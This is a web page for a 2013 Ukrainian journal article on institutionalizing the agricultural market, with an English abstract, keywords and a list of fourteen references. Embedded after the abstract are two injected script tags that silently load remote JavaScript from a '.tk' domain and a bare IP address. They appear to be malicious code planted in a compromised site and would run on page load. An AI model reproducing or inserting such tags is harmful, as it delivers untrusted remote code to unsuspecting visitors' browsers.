ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 330.341:338.432
Інституціональні проблеми розвитку аграрної сфери

Institutionalizing of the effective functioning of the agricultural market / Prylutskyi A.M. // Ekonomika APK. - 2013. - № 1 - P. 113

The article considers the influence of institutionalization on the agricultural market formation. The author gives grounds to the necessity of the measures aimed at the raise of the effectiveness of agricultural market functioning. The guidelines for further scientific research that can facilitate the process of enhancement are set. Refs: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: agricultural policy, agricultural market, institute, institution, pricing, competition, effectiveness

References

 1. Бойко Л.М. Регулювання земельних відносин у сільському господарстві: моногр. / Л. М. Бойко. - К. : ННЦ ІАЕ, 2011. - С.75.
 2. Гайдуцький П.І. Про основні засади реформування системи державної підтримки сільського господарства та сільської території / П.І. Гайдуцький // Економіка АПК. - 2005. - № 3. - С. 43-48.
 3. Данкевич А.С. Розвиток інтегрованих структур у сільському господарстві : моногр. / А.С. Данкевич - К.: ННЦ ІАЕ, 2011. - С. 287. Дем ’яненко М.Я. Фінансові проблеми формування та розвитку аграрного ринку // М.Я. Дем’яненко. - К. : Українська академія аграрних наук. ННЦ ІАЕ., 2007. - С. 3.
 4. Заяць ВМ. Розвиток ринку сільськогосподарських земель: монографія / В.М. Заєць. - К.: ННЦ ІАЕ, 2011. - С. 3.
 5. Зінчук Т. Європейський вектор розвитку агробізнесу / Т. Зінчук // Актуальні проблеми міжнародних відносин: зб. наук. праць. Вип. 105, ч. II (у двох частинах). - К.: Київський національний ун-т імені Тараса Шевченка. Інститут міжнародних відносин, 2012. - С. 59.
 6. Інноваційна діяльність в аграрній сфері : інституціональний аспект : моногр. / [Саблук П.Т., Шпикуляк О.Г., Курило Л.І. та ін.] - К. : ННЦ ІАЕ, 2010. - С. 20.
 7. Капсаее Ю.Ш. Методология институционализма при исследовании трансформаций российской экономики [Электронный ресурс] / Ю.Ш. Капсаев. - Режим доступа : http//www/ekonom.erd.ru.
 8. Коваленко Ю.С. Концептуальні засади та ескізний законопроект Закону України «Про організацію управління аграрним ринком» / Ю.С. Коваленко. - К.: ННЦ і ІАЕ, 2006. - С. 50.
 9. Кьостер, Ульріх. Основи аналізу аграрного ринку / наук. ред. пер. О. Нів’євський. - К. : Вид-во АДЕФ - Україна, 2012. - С. 125-126.
 10. Саблук П.Т. Розвиток земельних відносин в Україні / П.Т. Саблук. - К. : ННЦ ІАЕ, 2006. - С. 173.
 11. Тимченко С. Земельная реформа - это гигантский шаг вперед для каждого агрария и всей страны в целом / С. Тимченко // Сегодня. - 16 нояб. 2011. - С. 11.
 12. Шпикуляк О.Г. Інституції у розвитку та регулюванні аграрного ринку: моногр. / О.Г. Шпикуляк. - К.: ННЦ ІАЕ, 2006. - С. 290.
 13. ЯкубенкоВД. Базисні інститути у трансформаційній економіці : моногр. / В.Д. Якубенко. - К. : КНЕХ, 2004. - С. 34.
 14. Padberg D., Ritson C. and Albisu L., (eds). Agrofood marketing. Walling-ford: CAB International. - 492 p.
Read article: 13_01_17.pdf